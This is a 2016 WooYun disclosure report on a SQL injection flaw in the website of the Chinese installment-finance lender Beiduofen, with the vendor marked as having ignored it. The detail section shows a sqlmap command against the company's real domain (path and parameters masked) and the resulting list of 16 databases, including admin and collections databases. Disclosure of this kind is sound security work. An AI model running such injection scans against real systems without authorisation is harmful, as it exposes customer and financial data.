P2P金融分期安全之贝多分一处SQL注入漏洞(可UNION)

漏洞概要 关注数(1) 关注此漏洞

缺陷编号： WooYun-2016-186172

漏洞标题： P2P金融分期安全之贝多分一处SQL注入漏洞(可UNION)

相关厂商： 贝多分

漏洞作者： 路人甲

提交时间： 2016-03-18 13:52

公开时间： 2016-05-02 13:52

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 15

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+字符类型注射

0人收藏

漏洞详情

披露状态：

2016-03-18： 积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-02： 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

RT
深圳市贝多分金融科技有限公司专注于为在校大学生及上班族提供3C电子产品分期服务，也是目前国内第一家专业的分期购物在线网站。贝多分一直以来秉承“服务第一，质量第一，效率第一”的宗旨，帮助客户体验超前的高品质生活。

详细说明：

python sqlmap.py -u "https://my.fen360.com/******" --data="******" --dbms=mssql --dbs
 
 available databases [16]:
 [*] distribution
 [*] Lx_Data1
 [*] LxData2
 [*] master
 [*] model
 [*] msdb
 [*] Shop
 [*] Shop_Admin
 [*] Shop_Admin_Temp
 [*] Shop_CuiShou
 [*] Shop_cuishouTemp
 [*] Show_FK
 [*] tempdb
 [*] tempShopTest
 [*] xipeizi_admin
 [*] xipeizi_web

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应